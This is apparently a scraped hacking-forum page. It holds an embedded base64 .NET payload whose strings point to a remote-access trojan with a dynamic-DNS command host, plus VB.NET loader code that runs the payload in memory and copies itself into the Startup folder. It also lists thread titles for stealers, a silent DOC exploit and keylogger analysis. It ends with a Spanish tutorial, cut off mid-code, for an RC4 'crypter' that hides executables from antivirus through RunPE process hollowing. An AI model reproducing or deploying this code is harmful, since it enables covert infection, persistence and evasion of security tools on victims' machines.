BpbGVyU2VydmljZXMATmV3TGF0ZUJpbmRpbmcAVHlwZQBMYXRlQ2FsbABTdGFydABTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBDb21waWxlclJlc3VsdHMAUHJvamVjdERhdGEARW5kQXBwAGFkZF9BcHBsaWNhdGlvbkV4aXQARXhjZXB0aW9uAFNldFByb2plY3RFcnJvcgBDbGVhclByb2plY3RFcnJvcgBTbGVlcABTdHJpbmcARW1wdHkAQ29udmVyc2lvbnMAVG9JbnRlZ2VyAEVudmlyb25tZW50AFNwZWNpYWxGb2xkZXIAR2V0Rm9sZGVyUGF0aABDb25jYXQAU3lzdGVtLklPAEZpbGUAQ29weQBQcm9jZXNzAEludGVyYWN0aW9uAENyZWF0ZU9iamVjdABMYXRlR2V0AFJ1bnRpbWVIZWxwZXJzAEdldE9iamVjdFZhbHVlAExhdGVTZXQAT3BlcmF0b3JzAENvbXBhcmVTdHJpbmcAVG9TdHJpbmcATWljcm9zb2Z0LldpbjMyAFJlZ2lzdHJ5S2V5AFJlZ2lzdHJ5AEN1cnJlbnRVc2VyAENvbmNhdGVuYXRlT2JqZWN0AE9wZW5TdWJLZXkAR2V0VmFsdWUAVG9Cb29sZWFuAEJvb2xlYW4AUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAQ2hhbmdlVHlwZQBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludDMyAENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseQBMb2FkAFNldFZhbHVlAE1lbW9yeVN0cmVhbQBHZXRDdXJyZW50UHJvY2VzcwBnZXRfSGFuZGxlAEludFB0cgBvcF9FeHBsaWNpdABDb25kaXRpb25hbENvbXBhcmVPYmplY3RFcXVhbABTeXN0ZW0uTmV0LlNvY2tldHMAU2VsZWN0TW9kZQBDb21wYXJlT2JqZWN0TGVzc0VxdWFsAEFuZE9iamVjdABDb25kaXRpb25hbENvbXBhcmVPYmplY3RHcmVhdGVyAFN1YnRyYWN0T2JqZWN0AEJ5dGUAU29ja2V0RmxhZ3MAQ29udGFpbnMAUGFyYW1ldGVyaXplZFRocmVhZFN0YXJ0AExhdGVJbmRleEdldABnZXRfTGVuZ3RoAExhdGVJbmRleFNldENvbXBsZXgATGF0ZVNldENvbXBsZXgAVGNwQ2xpZW50AHNldF9SZWNlaXZlVGltZW91dABzZXRfU2VuZFRpbWVvdXQAc2V0X1NlbmRCdWZmZXJTaXplAHNldF9SZWNlaXZlQnVmZmVyU2l6ZQBnZXRfTWFjaGluZU5hbWUAZ2V0X1VzZXJOYW1lAGdldF9PU0Z1bGxOYW1lAGdldF9Ub3RhbFBoeXNpY2FsTWVtb3J5AFVJbnQ2NABTeXN0ZW0uR2xvYmFsaXphdGlvbgBDdWx0dXJlSW5mbwBnZXRfQ3VycmVudEN1bHR1cmUAZ2V0X05hbWUAU3lzdGVtLk5ldABEbnMAR2V0SG9zdE5hbWUASVBIb3N0RW50cnkAR2V0SG9zdEJ5TmFtZQBJUEFkZHJlc3MAZ2V0X0FkZHJlc3NMaXN0AFN5c3RlbS5UZXh0AFN0cmluZ0J1aWxkZXIARW52aXJvbgBDb252ZXJzaW9uAEhleABTcGFjZQBTeXN0ZW0uTWFuYWdlbWVudABNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0RW51bWVyYXRvcgBNYW5hZ2VtZW50T2JqZWN0AE1hbmFnZW1lbnRPYmplY3RTZWFyY2hlcgBHZXQAR2V0RW51bWVyYXRvcgBNYW5hZ2VtZW50QmFzZU9iamVjdABnZXRfQ3VycmVudABnZXRfSXRlbQBUb0ludDMyAE1vdmVOZXh0AElEaXNwb3NhYmxlAERpc3Bvc2UASUlmAGdldF9DYXBhY2l0eQBFbmNvZGluZwBnZXRfRGVmYXVsdABHZXRCeXRlcwBHZXRTdHJpbmcAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATGlzdGAxAFdyaXRlAFRvQXJyYXkAQWRkAFN0cmVhbQBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AR1ppcFN0cmVhbQBzZXRfUG9zaXRpb24AQ29tcHJlc3Npb25Nb2RlAFJlYWQAQ2xvc2UAZ2V0X1VURjgAVG9CYXNlNjRTdHJpbmcAVmFsdWVUeXBlAE51Y2xlYXIgRXhwbG9zaW9uLmV4ZQBrZXJuZWwzMgB1c2VyMzIAYXZpY2FwMzIuZGxsAHBzYXBpAGtlcm5lbDMyLmRsbABudGRsbC5kbGwAbXNjb3JsaWIAVkIkQW5vbnltb3VzRGVsZWdhdGVfMABBdG9taWMATnVjbGVhcl9FeHBsb3Npb24AX0Nsb3N1cmUkX18APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9NDMAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT02AFRhcmdldE9iamVjdABUYXJnZXRNZXRob2QAQmVnaW5JbnZva2UARGVsZWdhdGVDYWxsYmFjawBEZWxlZ2F0ZUFzeW5jU3RhdGUARW5kSW52b2tlAERlbGVnYXRlQXN5bmNSZXN1bHQASW52b2tlAE9XAEMAQ24AU0MAUFQASU5TVABJAE1TAEhvc3RzAFBvcnRzAElEAE1VVEVYAEgAUABTUEwAQXBwAFNDRwBESQBLZXkATVQALmNjdG9yAE1haW4ARXhlY3V0ZQBJTlMAUGluAGRhdGEAYgBJTlYATgBCeXRlcwBTAE0ATUQ1AEIATEEASVIATUFDAENLAFNlbmQASVAAR1ZJAEdldFZvbHVtZUluZm9ybWF0aW9uQQBWAFQAUQBHAEoAWABHRlcAR2V0Rm9yZWdyb3VuZFdpbmRvdwBHZXRXaW5kb3dUZXh0AGhXbmQAbHBTdHJpbmcAY2NoAGNhcEdldERyaXZlckRlc2NyaXB0aW9uQQB3RHJpdmVyAGxwc3pOYW1lAGNiTmFtZQBscHN6VmVyAGNiVmVyAEVtcHR5V29ya2luZ1NldABoUHJvY2VzcwBIV0QAQ0lWQwBPUABHZXRQcm9kdWN0AFByb2R1Y3QATVAAR0FXAFNCAHMAQlMAZngAV1JEAERlY29tcHJlc3MARW5jb2RlAElucHV0AERlY29kZQBfTGFtYmRhJF9fUjMyLTIAYTAAJEkAJEkyNC0wACRJUjI0LTEAX0xhbWJkYSRfX1IyNC0xAGExAF9MYW1iZGEkX18yNC0wADAzQzdGNEU4RkIzNTlBRUMwRUVGMDgxNEI2NkE3MDRGQzQzRkIzQTgANUIxRUU3Q0FEM0RGRjIyMEE5NUQxRDZCOTE0MzVEOUUxNTIwQUM0MQBOdWNsZWFyIEV4cGxvc2lvbgAAABEqAC0AXQBOAEsAWwAtACoAARFBAFAARwBnAHIAbwB1AHAAACdxAHUAZQBkAGEAMgAxADIAMgAuAGQAZABuAHMALgBuAGUAdAAsAAADLAAACTMAMwAzACwAACFiAFcAVgAxAFgAMgAxAGwAZABHADkAawBiADMATQA9AAAxUgBWAF8ATQBVAFQARQBYAC0AQwBhAEsAdQBTAEEAdABZAEIAeABHAGcAWgBIAHgAAQtTAHQAYQByAHQAAAUyADYAABdcAEMAbABpAGUAbgB0AC4AZQB4AGUAABtXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAAABAB1DAHIAZQBhAHQAZQBTAGgAbwByAHQAYwB1AHQAABdcAEMAbABpAGUAbgB0AC4AbABuAGsAABVUAGEAcgBnAGUAdABQAGEAdABoAAAJUwBhAHYAZQAAB1AATgBDAAADUAAAA1cAAAVJAEUAABNTAG8AZgB0AHcAYQByAGUAXAAAA1wAAANfAAA3SABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAAAdHAFAATAAABUwAUAAAB1UATgBWAAAdQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlAAAHVQBOAEkAAAlUAHIAdQBlAAAVQwBsAGkAZQBuAHQALgBlAHgAZQAADUMAbABpAGUAbgB0AAADLgAAE0MAbwBuAG4AZQBjAHQAZQBkAAAJUABvAGwAbAAAE0EAdgBhAGkAbABhAGIAbABlAAAPUgBlAGMAZQBpAHYAZQAAC1cAcgBpAHQAZQAAD1QAbwBBAHIAcgBhAHkAAA9EAGkAcwBwAG8AcwBlAAANbABlAG4AZwB0AGgAABVEAGkAcwBjAG8AbgBuAGUAYwB0AAAPQwBvAG4AbgBlAGMAdAAACVMAZQBuAGQAABdJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAcgAC8AIAAAAyAAAD1TAGUAbABlAGMAdAAgACoAIABmAHIAbwBtACAAQQBuAHQAaQBWAGkAcgB1AHMAUAByAG8AZAB1AGMAdAAAO1MARQBMAEUAQwBUACAAKgAgAEYAUgBPAE0AIABGAGkAcgBlAHcAYQBsAGwAUAByAG8AZAB1AGMAdAAAC0YAYQBsAHMAZQAACTIANQAwADAAAB1TAGUAbg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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAABAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" Dim APG() As Byte = Convert.FromBase64String(Farao_Sama) Threading.Thread.GetDomain().Load(APG).EntryPoint.Invoke(Nothing, Nothing) End Sub End Class Imports System Imports System.IO Module Module1 Sub Main() System.Threading.Thread.Sleep(35000) Dim startups As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) ' Shell("cmd /c ipconfig/release & ping -n 60 127.0.0.1 & ipconfig/renew & exit", vbHide) מבבנקְסאְֹטְְאְקמוְדפבסגקְּוקְְִּקבְגְפְַ(My.Resources.dll, "dll.Class1", "Mestre_Queda") System.IO.File.Copy(Application.ExecutablePath, startups + "\\Inject.exe") ''1 Name File : 2 Name Class1 : 3 Name Main End Sub Public Function מבבנקְסאְֹטְְאְקמוְדפבסגקְּוקְְִּקבְגְפְַ(ByVal I() As Byte, ByVal C As String, ByVal P As String) As Object Dim a As Text.ASCIIEncoding = Text.ASCIIEncoding.ASCII Dim HKHKJKJK As New System.Reflection.Emit.DynamicMethod("", GetType(Object), New [Type]() {GetType(Byte()), GetType(String), GetType(String), GetType(Object())}) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_0) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Reflection.Assembly).GetMethod(a.GetString({&H4C, &H6F, &H61, &H64}), New [Type]() {GetType(Byte())})) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_1) HKHKJKJK.GetILGenerator.EmitCall(System.Reflection.Emit.OpCodes.Callvirt, GetType(Reflection.Assembly).GetMethod(a.GetString({&H47, &H65, &H74, &H54, &H79, &H70, &H65}), New [Type]() {GetType(String)}), Nothing) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Activator).GetMethod(a.GetString({&H43, &H72, &H65, &H61, &H74, &H65, &H49, &H6E, &H73, &H74, &H61, &H6E, &H63, &H65}), New [Type]() {GetType(Type)})) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(System.Runtime.CompilerServices.RuntimeHelpers).GetMethod(a.GetString({&H47, &H65, &H74, &H4F, &H62, &H6A, &H65, &H63, &H74, &H56, &H61, &H6C, &H75, &H65}), New [Type]() {GetType(Object)})) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_2) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldc_I4_1) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ldarg_3) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Call, GetType(Interaction).GetMethod(a.GetString({&H43, &H61, &H6C, &H6C, &H42, &H79, &H4E, &H61, &H6D, &H65}))) HKHKJKJK.GetILGenerator.Emit(System.Reflection.Emit.OpCodes.Ret) Return CallByName(HKHKJKJK, a.GetString({&H49, &H6E, &H76, &H6F, &H6B, &H65}), CallType.Method, {HKHKJKJK, New Object() {I, C, P, New Object() {}}}) End Function End Module
  2. Ab Stealer Panel + Video Tutorial by KingDomSc

    Re: Ab Stealer Panel + Video Tutorial by KingDomSc grab outlook logins?
  3. Silent DOC Exploit - Python 2016

    Re: Silent DOC Exploit - Python 2016 FELICIDADES, es una gran herramienta
  4. Analise Downloader Keylloger Banker Analise com IDA Analise Server Spynet Perigos da Analise Preparando Ambiente Olly Preparação Removendo UPX com OLLy
  5. sOURCE SUBMAIN GENERATOR AU3

    GENERADOR "subprincipal y RC4" AutoIt PARA STUDOS SENHA:queda_most [VERDE]Files are Clean[/VERDE] & Functional [Analyzed by you2004975] [HIDE-THANKS][Hidden Content]]
  6. [ES]-Creating-a-splash-scren-in-effect

    Okay, let's post this sismples show how to do an effect on its splash screen, so that gives a more aprofessional look to our projects. >create a new form después de crear una nueva forma, establecer una imagen como backgraund, el siguiente paso es añadir un contador de tiempo, ahora vamos a ir a la fuente. En el caso de Form2_FormClosing añadido >For FadeOut = 90 To 10 Step -10 Me.Opacity = FadeOut / 100 Me.Refresh() Threading.Thread.Sleep(500) Next In the event Form2_Load added >Timer1.Start() For FadeIn = 0.0 To 1.1 Step 0.1 Me.Opacity = FadeIn Me.Refresh() Threading.Thread.Sleep(100) Next the timer event >Timer1.Enabled = False Form1.Show() Me.Visible = False ahora progeto en las propiedades y configurado para iniciarse el form2 principal. Aquí está el proyecto terminado listo
  7. [es][tuto]crypter runtime vb.net by queda

    buenas chicas, esta situación va a enseñar, hacer un crypter con RunPE y efecto splash en vb.2008 este estado y se dedica dekoders oversec. necesidad de construir los primeros dos formularios, uno para el cliente a otro splash Form1--cliente Form2--Splash vamos a poner manos a la obra y hacer que el cliente, primero debe crear un cuadro de texto y dos botones. lo hicieron en el código mediante la adición a la parte superior >Imports System.Text >Const Jod_Separador = "@_Jod_@" agregar el componente OpenFileDialog en el evento click del botón 1 agregue el siguiente código: >'----------------Abertura do Arquivo a ser encriptado------------ OpenFileDialog1.FileName = "" OpenFileDialog1.Filter = "Exe(*.exe)|*.exe" OpenFileDialog1.ShowDialog() TextFile.Text = OpenFileDialog1.FileName En el evento click del botón 2 vamos a añadir dos declaraciones de variables: > '--------------Declarações das variaveis--------------------- Dim Jod_Aberturabin As String Dim Jod_Modulo_Princi As String Dim Jod_Separador As String = "@_Jod_@" Dim Jod_nomeArq As String en el evento click del botón 2 agregue el siguiente código: > '----------------Proteçãao do arquivo--------------------- If Jod_salvar.ShowDialog = Windows.Forms.DialogResult.OK Then Jod_nomeArq = Jod_salvar.FileName Else : Exit Sub End If Jod_salvar.Filter = "Executáveis (*.exe)|*.exe" '----------------------------------------------------------- continuar con el botón dos, vamos a abrir los archivos binarios: >FileOpen(1, TextFile.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default) Jod_Aberturabin = Space(LOF(1)) FileGet(1, Jod_Aberturabin) FileClose(1) '------------------------------------------------------------- FileOpen(1, Application.StartupPath & "\stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default) Jod_Modulo_Princi = Space(LOF(1)) FileGet(1, Jod_Modulo_Princi) FileClose(1) '------------------------------------------------------------ FileOpen(1, Jod_nomeArq, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, Jod_Modulo_Princi & Jod_Separador & rc4(Jod_Aberturabin, "Jodkeyencript")) FileClose(1) después de agregar el módulo de cifrado RC4 que fue elegido: >Public Shared Function rc4(ByVal message As String, ByVal password As String) As String Dim i As Integer = 0 'pega daqui Dim j As Integer = 0 Dim cipher As New StringBuilder Dim returnCipher As String = String.Empty Dim sbox As Integer() = New Integer(256) {} Dim key As Integer() = New Integer(256) {} Dim intLength As Integer = password.Length Dim a As Integer = 0 While a <= 255 Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0)) key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp) sbox(a) = a System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While Dim x As Integer = 0 Dim b As Integer = 0 While b <= 255 x = (x + sbox(b) + key(b)) Mod 256 Dim tempSwap As Integer = sbox(b) sbox(b) = sbox(x) sbox(x) = tempSwap System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1) End While a = 1 While a <= message.Length Dim itmp As Integer = 0 i = (i + 1) Mod 256 j = (j + sbox(i)) Mod 256 itmp = sbox(i) sbox(i) = sbox(j) sbox(j) = itmp Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256) Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0) itmp = Asc(ctmp) Dim cipherby As Integer = itmp Xor k cipher.Append(Chr(cipherby)) System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While returnCipher = cipher.ToString cipher.Length = 0 Return returnCipher End Function listo concluir la estructura del cliente, ahora vamos a hacer splash: oversec.org/showthread.php?1107-ES-Creating-a-splash-scren-in-effect Pasamos ahora a la evolución del talón, cree un nuevo proyecto y en el formulario, agregue el siguiente código: > Me.Visible = False Me.Hide() '---------Separador----------------- Dim Jod_Form_seperador As String = "@_Jod_@" Dim Jod_Capt_Prc As String Jod_Capt_Prc = Process.GetCurrentProcess().MainModule.FileName Dim Jod_Ptc As String = System.IO.Path.GetTempPath Dim Jod_Arq_Leitor, Jod_Pega_Geral(), Jod_Para_cry As String '------------------------------------ FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared) Jod_Arq_Leitor = Space(LOF(1)) FileGet(1, Jod_Arq_Leitor) FileClose(1) '-------------------------------------- Jod_Pega_Geral = Split(Jod_Arq_Leitor, Jod_Form_seperador) Jod_Para_cry = iRvFqeDEfJ(Jod_Pega_Geral(1), "Jodkeyencript") Dim Jod_Convert_Bytes() As Byte Jod_Convert_Bytes = Encoding.Default.GetBytes(Jod_Para_cry) Try S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0.Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(Jod_Convert_Bytes, Jod_Capt_Prc) Catch ex As Exception End Try FileOpen(5, Jod_Ptc & "\Jodhsghgsjhks.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(5, Jod_Para_cry) FileClose(5) Me.Close() Ahora cree un nuevo módulo RunPE >Imports System.ComponentModel Imports System.Runtime.InteropServices Public Class S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0 Public Const SDnNle9g5VF2VbJGGZlWNjH8OJ9Wcjyw9HYEPDliWtCnf9 As Long = &H200 Public Const SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt As Long = &H40 Public Const S7MFd3CpqpMqb2C0vP4pbzNH0tPv9tgbwrgJwOm8ymYHSn As Long = &H80 Public Const S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A As Long = &H20 Public Const SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM As Long = &H10 Public Const SJf1ylUN6liDLXTU4ZfL3A2X53qOFXCvSGJCxTKR9t33GL As Long = &H8 Public Const Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So As Long = &H1 Public Const SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb As Long = &H4 Public Const SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC As UInt32 = &H2 Shared Sub Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(ByVal SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq() As Byte, ByVal ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg As String) Dim SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF As S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6 Dim SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY = GCHandle.Alloc(SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, GCHandleType.Pinned) Dim SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F As Integer = SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject.ToInt32 Dim SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT = Marshal.PtrToStructure(SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject, SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.GetType) SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.Free() If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.CreateProcess(Nothing, ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh, False, 4, Nothing, Nothing, 